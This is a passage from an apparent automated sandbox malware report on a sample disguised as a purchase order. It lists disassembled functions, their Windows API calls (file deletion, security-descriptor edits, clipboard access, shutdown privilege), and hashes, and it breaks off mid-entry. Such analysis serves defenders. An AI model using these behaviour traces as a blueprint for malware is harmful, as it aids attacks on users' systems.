                            • Part of subcall function 00CFD5EE: GetWindowRect.USER32(?,?), ref: 00CFD68D
                            • Part of subcall function 00CFD5EE: PtInRect.USER32(?,?,00CFEB2C), ref: 00CFD69D
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00CFF1B4
                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00CFF1BF
                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00CFF1E2
                          • _wcscat.LIBCMT ref: 00CFF212
                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00CFF229
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00CFF242
                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00CFF259
                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00CFF27B
                          • DragFinish.SHELL32(?), ref: 00CFF282
                          • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00CFF36D
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                          • API String ID: 2166380349-3440237614
                          • Opcode ID: 33c18ac069b589527d94b0e752004ed3d5d15d3e9fbb44f30245f3af11a94ec8
                          • Instruction ID: c56367625519650ffd479b7945b86caeae4a1144fd13ffa242302ed0035bd582
                          • Opcode Fuzzy Hash: 33c18ac069b589527d94b0e752004ed3d5d15d3e9fbb44f30245f3af11a94ec8
                          • Instruction Fuzzy Hash: 5B614971408304AFC710EF64DC85EABBBF9FF89750F004A1DF695922A1DB709A49DB62
                          Function 00CE219F Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(?,?,75728FB0,?,00000000), ref: 00CE21C0
                          • _wcscmp.LIBCMT ref: 00CE21D5
                          • _wcscmp.LIBCMT ref: 00CE21EC
                            • Part of subcall function 00CD7606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00CD7621
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00CE221B
                          • FindClose.KERNEL32(00000000), ref: 00CE2226
                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00CE2242
                          • _wcscmp.LIBCMT ref: 00CE2269
                          • _wcscmp.LIBCMT ref: 00CE2280
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE2292
                          • SetCurrentDirectoryW.KERNEL32(00D43A68), ref: 00CE22B0
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CE22BA
                          • FindClose.KERNEL32(00000000), ref: 00CE22C7
                          • FindClose.KERNEL32(00000000), ref: 00CE22D7
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                          • String ID: *.*
                          • API String ID: 1824444939-438819550
                          • Opcode ID: a90366583bd5572f72e0a1c7e7b39276b530eab48e24693e8a7727dbecec9175
                          • Instruction ID: 73573641e29b14b1e7e2c4c17008165f12eedf8a4cc2d6393f43288aef4ef1cb
                          • Opcode Fuzzy Hash: a90366583bd5572f72e0a1c7e7b39276b530eab48e24693e8a7727dbecec9175
                          • Instruction Fuzzy Hash: 5C31DE3290035A7ECB20ABA5EC49FDE73AD9F05330F144151EA20E2190EB30DB89DA65
                          Function 00C96BBC Relevance: 21.9, APIs: 5, Strings: 7, Instructions: 891COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _memmove_memset
                          • String ID: Q\E$[$\$\$\$]$^
                          • API String ID: 3555123492-286096704
                          • Opcode ID: 05f9e42816dc90a222a846d2fb2a0a8ef92c949700124fc5e503ffad042409bf
                          • Instruction ID: 0d3b7c9ded534d48b96687c12aa16305eb53be6db3490a9ecadab40ce995c8f7
                          • Opcode Fuzzy Hash: 05f9e42816dc90a222a846d2fb2a0a8ef92c949700124fc5e503ffad042409bf
                          • Instruction Fuzzy Hash: AB72AE71D04219DBDF24CF98C9846EDBBB1FF44314F2881A9E855AB381D774AE81DBA0
                          Function 00CFECBC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00CAAF8E
                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00CFED0C
                          • GetFocus.USER32 ref: 00CFED1C
                          • GetDlgCtrlID.USER32(00000000), ref: 00CFED27
                          • _memset.LIBCMT ref: 00CFEE52
                          • GetMenuItemInfoW.USER32 ref: 00CFEE7D
                          • GetMenuItemCount.USER32(00000000), ref: 00CFEE9D
                          • GetMenuItemID.USER32(?,00000000), ref: 00CFEEB0
                          • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00CFEEE4
                          • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00CFEF2C
                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CFEF64
                          • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 00CFEF99
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                          • String ID: 0
                          • API String ID: 3616455698-4108050209
                          • Opcode ID: f26dcb28b67fef2d94f64791d3fa3183ef05ddbba05a923f1955e14d4c63e946
                          • Instruction ID: 51f63d096ab7d1745bcfc8033d491a3213990401ef3d2c67657db8277c7e494b
                          • Opcode Fuzzy Hash: f26dcb28b67fef2d94f64791d3fa3183ef05ddbba05a923f1955e14d4c63e946
                          • Instruction Fuzzy Hash: C2819E71108309AFDB50CF54D884ABBBBE5FB88354F00492DFAA5972A1D730DA05DB63
                          Function 00CCB398 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CCB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00CCB903
                            • Part of subcall function 00CCB8E7: GetLastError.KERNEL32(?,00CCB3CB,?,?,?), ref: 00CCB90D
                            • Part of subcall function 00CCB8E7: GetProcessHeap.KERNEL32(00000008,?,?,00CCB3CB,?,?,?), ref: 00CCB91C
                            • Part of subcall function 00CCB8E7: RtlAllocateHeap.NTDLL(00000000,?,00CCB3CB), ref: 00CCB923
                            • Part of subcall function 00CCB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00CCB93A
                            • Part of subcall function 00CCB982: GetProcessHeap.KERNEL32(00000008,00CCB3E1,00000000,00000000,?,00CCB3E1,?), ref: 00CCB98E
                            • Part of subcall function 00CCB982: RtlAllocateHeap.NTDLL(00000000,?,00CCB3E1), ref: 00CCB995
                            • Part of subcall function 00CCB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00CCB3E1,?), ref: 00CCB9A6
                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00CCB3FC
                          • _memset.LIBCMT ref: 00CCB411
                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00CCB430
                          • GetLengthSid.ADVAPI32(?), ref: 00CCB441
                          • GetAce.ADVAPI32(?,00000000,?), ref: 00CCB47E
                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00CCB49A
                          • GetLengthSid.ADVAPI32(?), ref: 00CCB4B7
                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00CCB4C6
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CCB4CD
                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00CCB4EE
                          • CopySid.ADVAPI32(00000000), ref: 00CCB4F5
                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00CCB526
                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00CCB54C
                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00CCB560
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                          • String ID:
                          • API String ID: 2347767575-0
                          • Opcode ID: 3dde48e1b72596bd370823c02609bb17512c2f1578e76f2b0530eb98b77455b7
                          • Instruction ID: 881ddde4403c27e97e8ecf31ecdafc470740b6402c2219b45522647743d2705b
                          • Opcode Fuzzy Hash: 3dde48e1b72596bd370823c02609bb17512c2f1578e76f2b0530eb98b77455b7
                          • Instruction Fuzzy Hash: B551F77190020AABDF14DFA5DC46EEEBB79BF08304F148129E925A6291DB35DE06DB60
                          Function 00CD6E4A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 85fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00C931DA
                            • Part of subcall function 00CD7C0C: GetFileAttributesW.KERNEL32(?,00CD6A7B), ref: 00CD7C0D
                          • _wcscat.LIBCMT ref: 00CD6E7E
                          • __wsplitpath.LIBCMT ref: 00CD6E99
                          • FindFirstFileW.KERNEL32(?,?), ref: 00CD6EAE
                          • _wcscpy.LIBCMT ref: 00CD6EDD
                          • _wcscat.LIBCMT ref: 00CD6EEF
                          • _wcscat.LIBCMT ref: 00CD6F01
                          • DeleteFileW.KERNEL32(?), ref: 00CD6F0E
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CD6F22
                          • FindClose.KERNEL32(00000000), ref: 00CD6F3D
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                          • String ID: \*.*
                          • API String ID: 2643075503-1173974218
                          • Opcode ID: e06c111f82530a926f62f3bc3331fc1837e2f528478e8685d7ce6957be3ebb9b
                          • Instruction ID: df132c5cb81f0b66bab6ff1df938a23d1afc86a48b3d3b4e101f3d0061dd5d32
                          • Opcode Fuzzy Hash: e06c111f82530a926f62f3bc3331fc1837e2f528478e8685d7ce6957be3ebb9b
                          • Instruction Fuzzy Hash: 53218F72409384BEC610EBA498859DBBBDC9B99214F444E1BF9E4C3252EB34D64DC7A2
                          Function 00CE7294 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                          • String ID:
                          • API String ID: 1737998785-0
                          • Opcode ID: 703032528b9ad5ba9422dd293302430c4eebae14351279053bc8318ae1e46ae3
                          • Instruction ID: 48a7d4ea57b81352cb61d2984120c05235000eaf50e63a69ae30907f38765380
                          • Opcode Fuzzy Hash: 703032528b9ad5ba9422dd293302430c4eebae14351279053bc8318ae1e46ae3
                          • Instruction Fuzzy Hash: A0219F31604311AFDB10AF25DC59B6E7BA9FF44721F00811AF94ADB3A1DF74E9019BA4
                          Function 00CEC604 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CCA857: CLSIDFromProgID.COMBASE ref: 00CCA874
                            • Part of subcall function 00CCA857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 00CCA88F
                            • Part of subcall function 00CCA857: lstrcmpiW.KERNEL32(?,00000000), ref: 00CCA89D
                            • Part of subcall function 00CCA857: CoTaskMemFree.COMBASE(00000000), ref: 00CCA8AD
                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00CEC6AD
                          • _memset.LIBCMT ref: 00CEC6BA
                          • _memset.LIBCMT ref: 00CEC7D8
                          • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 00CEC804
                          • CoTaskMemFree.COMBASE(?), ref: 00CEC80F
                          Strings
                          • NULL Pointer assignment, xrefs: 00CEC85D
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                          • String ID: NULL Pointer assignment
                          • API String ID: 1300414916-2785691316
                          • Opcode ID: 001b935e82d1897811830b9575b2b58c25cbb19ca34b2725de0956e31c183858
                          • Instruction ID: 1b37a99ae92291a4f6b84773559d10708ad7cccb30a36789cfc8fd4b064db79a
                          • Opcode Fuzzy Hash: 001b935e82d1897811830b9575b2b58c25cbb19ca34b2725de0956e31c183858
                          • Instruction Fuzzy Hash: 33913971D00228ABDF20DFA5DC85EDEBBB9AF08710F20412AF519A7291DB705A45DFA0
                          Function 00CE24A9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119filesleepCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00CE24F6
                          • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00CE2526
                          • _wcscmp.LIBCMT ref: 00CE253A
                          • _wcscmp.LIBCMT ref: 00CE2555
                          • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00CE25F3
                          • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00CE2609
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                          • String ID: *.*
                          • API String ID: 713712311-438819550
                          • Opcode ID: 4c6be6ddbe948bdb7634e933e5b07a4b33c0d71f5b4366153e683aee66e36980
                          • Instruction ID: 9155f5090c07da91fb9b9690493270ea72d73deb4b359b447f34493366dedd10
                          • Opcode Fuzzy Hash: 4c6be6ddbe948bdb7634e933e5b07a4b33c0d71f5b4366153e683aee66e36980
                          • Instruction Fuzzy Hash: 8041807190525AAFCF11DFA5CD49BEEBBB8FF08310F144456F425A2190EB309B84DB60
                          Function 00C98CA0 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1058COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID:
                          • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                          • API String ID: 0-1546025612
                          • Opcode ID: 4822fe1e9718dea5fa9dd09211f52635aa9c87757973aa45e092ef2a61ceaccf
                          • Instruction ID: ac11b49258a0ee0186813c68267ae4a417499c57e9d4cfc1ee4f681f0ba9321b
                          • Opcode Fuzzy Hash: 4822fe1e9718dea5fa9dd09211f52635aa9c87757973aa45e092ef2a61ceaccf
                          • Instruction Fuzzy Hash: 82926C75E0021A9BDF24CF58D8487EDB7B1FB54314F1451AAD869AB280EB709EC1CFA1
                          Function 00C98530 Relevance: 11.0, APIs: 7, Instructions: 531COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          • Opcode ID: 98f4c2fc7d5190a102dff8da6c7f7f2ce98060079c96cc2befdfdb9e22cb46c5
                          • Instruction ID: be2f20e56ad6067d3901123045cfbd822c21b1a63526fd223e6800805afbc9cb
                          • Opcode Fuzzy Hash: 98f4c2fc7d5190a102dff8da6c7f7f2ce98060079c96cc2befdfdb9e22cb46c5
                          • Instruction Fuzzy Hash: 06128E70A00609DFDF04DFA5C989AAEB3F5FF49300F244569E40AE7290EB35AE15DB60
                          Function 00CFEAA6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 149nativewindowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00CAAF8E
                            • Part of subcall function 00CAB736: GetCursorPos.USER32(000000FF), ref: 00CAB749
                            • Part of subcall function 00CAB736: ScreenToClient.USER32(00000000,000000FF), ref: 00CAB766
                            • Part of subcall function 00CAB736: GetAsyncKeyState.USER32(00000001), ref: 00CAB78B
                            • Part of subcall function 00CAB736: GetAsyncKeyState.USER32(00000002), ref: 00CAB799
                          • ReleaseCapture.USER32 ref: 00CFEB1A
                          • SetWindowTextW.USER32(?,00000000), ref: 00CFEBC2
                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00CFEBD5
                          • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00CFECAE
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                          • API String ID: 973565025-2107944366
                          • Opcode ID: adf2c26ec8b8b74d19d94c7f2ca0afec9dba68b234837fa82dbbb06967d3677e
                          • Instruction ID: 0ba4815d2f4f229acada3ea25e1b7d32b2f93ff593dbf13a7ce5a5cb1465e18c
                          • Opcode Fuzzy Hash: adf2c26ec8b8b74d19d94c7f2ca0afec9dba68b234837fa82dbbb06967d3677e
                          • Instruction Fuzzy Hash: 6251CD74104308AFD714EF24CC96FAA7BE5FB88744F00491DFA96972E2CB709905DB62
                          Function 00CD82D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CCBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CCBF0F
                            • Part of subcall function 00CCBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CCBF3C
                            • Part of subcall function 00CCBEC3: GetLastError.KERNEL32 ref: 00CCBF49
                          • ExitWindowsEx.USER32(?,00000000), ref: 00CD830C
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                          • String ID: $@$SeShutdownPrivilege
                          • API String ID: 2234035333-194228
                          • Opcode ID: 225baf80bd8080c86d99d2d28fa6d612b2ca644706237e51aeff64ce7ce73f0c
                          • Instruction ID: 47db2a769884a31e925f245f311b9a9c3e9fbde527e87b25dcf86d474cf1b4c7
